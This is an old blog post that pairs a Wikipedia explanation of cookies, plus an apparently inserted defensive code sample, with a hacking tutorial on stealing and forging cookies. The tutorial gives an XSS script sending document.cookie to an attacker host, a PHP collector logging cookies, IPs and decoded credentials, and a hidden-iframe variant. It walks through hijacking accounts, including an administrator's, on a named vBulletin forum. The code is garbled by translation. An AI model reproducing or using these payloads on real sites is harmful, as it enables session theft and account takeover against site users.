Friday, June 22, 2007

Dangers Of Non Microwave




Cookie Poisoning, by SkapperMX



What are cookies?

A cookie is a piece of information that is stored on the hard drive of a web page's visitor, through the browser, at the request of the page's server. This information can then be retrieved by the server on subsequent visits. Cookies were invented by Lou Montulli, a former employee of Netscape Communications. Because the HTTP protocol cannot maintain information by itself, any information that has to persist from one page view to the next (such as the user's login, color preferences, etc.) must be stored either in the URL of the page, on the server itself, or in a cookie on the visitor's computer.

Thus, the most common uses of cookies are:

* Keeping track of users: when a user enters their username and password, a cookie is stored so that they do not have to be entered again for each page of the server. However, a cookie does not identify a person, but a combination of computer and browser.
* Offering designs (colors, backgrounds, etc.) or content to the visitor.
* Gathering information about the user's browsing habits, and spyware attempts, by advertising agencies and others. This can cause privacy problems and is one of the reasons why cookies have their detractors.

Originally, cookies could only be stored at the request of a CGI on the server, but Netscape gave its JavaScript language the ability to set them directly from the client, without CGIs. At first, because of browser bugs, this caused some security problems, which were subsequently resolved.

These vulnerabilities were discovered by Esteban Rossi [citation needed]. Cookies can be deleted, accepted or blocked as desired; to do so, one only needs to configure the web browser properly.

Cookie theft


Cross-site scripting allows the value of a cookie to be sent to servers that would not normally receive that information. Modern browsers allow the execution of code segments received from the server. If cookies are accessible during that execution, their value can be communicated in some way to servers that should not have access to them. The process that allows an unauthorized party to receive a cookie is called cookie theft, and encryption does not work against this type of attack.




Cookie counterfeiting

Although cookies must be stored and sent back to the server unchanged, an attacker could modify the value of a cookie before returning it. If, for example, a cookie contains the total value of a user's purchase on a web site, changing that value could allow the attacker to pay less than what is due for the purchase. The process of modifying the value of cookies is called cookie counterfeiting, and it is often carried out after a cookie theft to make an attack persistent.

However, most web sites store only a session ID in the cookie, a unique number used to identify the user's session, while the rest of the information is stored on the server itself. In this case, the problem of cookie counterfeiting is virtually eliminated.

Source: Wikipedia.com
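The server-side counterpart to the theft and counterfeiting sections above, as an added example that is not part of the original post or of the quoted Wikipedia text: the cookie carries only a signed random session ID, and it is issued with `HttpOnly` so that page script cannot read it through `document.cookie`. The function names, the in-memory store and the sample values are assumptions made for illustration (Node.js, standard `crypto` module).

```javascript
// Added example: signed session-ID cookie with HttpOnly (constructed names and values).
const crypto = require('crypto');

const SECRET = crypto.randomBytes(32); // server-side key, never sent to the client
const sessions = new Map();            // server-side store: session id -> user data

// Append an HMAC so that any change made on the client side is detectable.
function sign(value) {
  const mac = crypto.createHmac('sha256', SECRET).update(value).digest('hex');
  return `${value}.${mac}`;
}

// Return the original value if the MAC matches, otherwise null.
function verify(cookie) {
  const dot = cookie.lastIndexOf('.');
  if (dot < 0) return null;
  const value = cookie.slice(0, dot);
  const given = Buffer.from(cookie.slice(dot + 1));
  const expected = Buffer.from(sign(value).slice(dot + 1));
  if (given.length !== expected.length) return null;
  return crypto.timingSafeEqual(given, expected) ? value : null;
}

// The cookie holds only a random ID; purchase totals, user names etc. stay on the server.
function createSession(data) {
  const id = crypto.randomBytes(16).toString('hex');
  sessions.set(id, data);
  // HttpOnly: not readable from document.cookie. Secure: sent over HTTPS only.
  return `sid=${sign(id)}; HttpOnly; Secure; SameSite=Lax; Path=/`;
}

// Resolve a session from the value of a request's Cookie header.
function loadSession(cookieHeader) {
  const m = /(?:^|;\s*)sid=([^;]+)/.exec(cookieHeader);
  const id = m && verify(m[1]);
  return id && sessions.has(id) ? sessions.get(id) : null;
}

// Constructed demonstration: a client-edited value fails verification.
const signedTotal = sign('total=100');
console.log(verify(signedTotal));                                 // 'total=100'
console.log(verify(signedTotal.replace('total=100', 'total=1'))); // null
```

Signing only detects modification: a stolen cookie that is replayed unchanged still verifies, which is why the `HttpOnly` flag and output encoding against XSS are needed alongside it.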



Welcome to my second tutorial. In it we will see, with real examples, how to carry out a cookie forgery, or cookie poisoning. I am not responsible for partial damage to sites caused by this information ... For this tutorial you need various tools:

- FlashFXP
- Mozilla Firefox






Stage 1 Preparation Tools



Remember the XSS vulnerability? It is a well-known attack with which a cookie-stealer script can be built.

The script is the following code:


Code:

 
\u0026lt;script> self.location.href = 'http://misitio .com / log.php? c = '+ escape (document.cookie) \u0026lt;/ script>


Let's analyze the code part by part:


Code:
\u0026lt;script>
Here we declare to the server that this is a script.

Code:
 self.location.href 

This is a JavaScript command that redirects the page to our site.


Code:
 + escape (document.cookie); 

This is the important part: here we state that the variable c is to hold the current cookie.


Code:
\u0026lt;/ script>


Here we close our script. We now have our cookie-stealer code, so how do we store the cookie?

Simply with the following PHP code, which captures all the data sent by the script and saves it to a file that it creates. We will call this PHP code the sensor.
Code:

 
\u0026lt;?
php $ file = fopen ('log2.htm', 'a');// Here we can change the file name to create
$ cookie = $ _GET [' c '] = $ user
$ _GET ['id'];
$ ip = getenv ('REMOTE_ADDR');
$ re = $ HTTPREFERRER;

$ date = date ("j F, Y, g: ia");
fwrite ($ file '\u0026lt;hr> USER AND PASSWORD: '. Base64_decode ($ user). "Facebook Cookie:'. $ Cookie." Facebook page: '. $ Re. "Facebook

IP:'. $ Ip. '
Date and Time:'. $ Date. '\u0026lt;/ Hr>');
fclose ($ file);
?>



As you can see, it is no big deal. We have our tools, so how is the attack launched? In this way.

There are 3 steps to get a perfect fit, which are:

1.- Find a website that has some XSS vulnerability
2.- Find a free host and upload our cookie sensor with 777 permissions
3.- Inject our code (script)
4.- After some days, check our sensor and forge the cookies

We create a free hosting account at BolHost.com or any other free hosting site that supports PHP.

We upload everything to our hosting via FTP or manually through the web.

We give 777 permissions to our sensor.

Get Ready for the attack ......




Stage 2 Injection and Theft



We will attack the following website, which has an XSS bug in its posts.

We try the XSS test script and ...

As we can see, it is vulnerable to XSS. Now we inject our cookie-stealer code ...

And it should redirect to our website, stealing the cookie immediately ...

We go to our collector ... We have cookies!

And now ... we forge the cookies.

P.S. I will use Firefox to forge the cookie because I feel more comfortable with it.
I will use the following plugin, which is called Cookie Editor.

Stage 3 Cookie Poisoning

We open Mozilla and install our dear plugin ...

OK, with our plugin installed, we head to our hosting (where we have our friend the cookie collector) ...

I download it ...

And we see a lot of letters ...

Remember that the site attacked was www.teambio.net; let's see ...

As you can see with your own eyes, this is a forum running software from the company vBulletin, in which, as we all know, it is hard to find a vulnerability. But I found this one on a day when I did not know where to go: I entered this website to post a topic, and I wondered what would happen if I put our beloved XSS test script into a post. I tried it and voilà! I got an alert message. I then injected the cookie-stealing script into a post, and after two or three days of waiting I had my beautiful cookies and, guess what, the administrator's too! That got me excited and I quickly did a cookie poisoning. But let's leave my experience aside, newbies.


And how will we poison it? Very simple: we go to the website to attack, which in our case is TeamBio.




Now we register and log in as a normal user, but remember that we have to tick the "Always Remember" box so that the cookie is sent to our computer and we can create and modify it to our liking.

Now we look at the cookie generated for us by the TeamBio website.

As we can see, we have some letters; if you compare them with the captured data, you will observe that the cookies are almost equal, differing only in certain data ...




Now we open our beloved Firefox and select Tools, Cookie Editor.

We now have all the cookies stored on the computer by other sites; in the filter we type the word team (for teambio) and ...

Now we know all the data that is in our cookies. Now I just change the information in our original cookie for the data we captured, clicking on any of the parts and then Edit.





We visit the website now and ... we are logged in as another user!



This concludes my second tutorial, I hope you have enjoyed and understood.

P.S. The sample site may no longer be vulnerable to these attacks ...


-= Team UnderCode =-

SkapperMX "You're nobody in life until you do something special ..."


SkapperMX at gmail dot com
Skapper_MX at hotmail dot com


blogger Notes:

  • 1) There is an error in the script for the collector; it should be as follows:
    self.location \u0026lt;script> . href = 'http://misitio.com/captador.php?c =' + escape (document.cookie) \u0026lt;/ script>.

  • 2) For local servers, the permissions must be set to CHMOD 777

  • 3) You can use the iframe tag to camouflage the pickup page ...

    \u0026lt;iframe
     
    src="http://[server]/xss.html" height="1" width="1" frameborder="0"> \u0026lt;/ iframe>



     
    \u0026lt;! - script.js -!>
    \u0026lt;script>
    self.location.href = 'http:// [server] /? c =' + escape (document.cookie);
    \u0026lt;/ script >



     


     
    \u0026lt;?
    php / / index.php
    $ file = fopen ('log2.htm', 'a');// Here we can change the file name create
    $ cookie = $ _GET ['c'];
    $ user = $ _GET ['id'];
    $ ip = getenv ('REMOTE_ADDR');
    $ re = $ HTTPREFERRER;

    $ date = date ("j F, Y, g: ia");
    fwrite ($ file, '\u0026lt;hr> USER AND PASSWORD:'. base64_decode ($ user). "Facebook Cookie: '. $ cookie." Facebook page:'. $ re. "


    IP: '. $ ip. "Facebook Date and Time:'. $ date." \u0026lt;/ hr> ');
    fclose ($ file);
    ?>

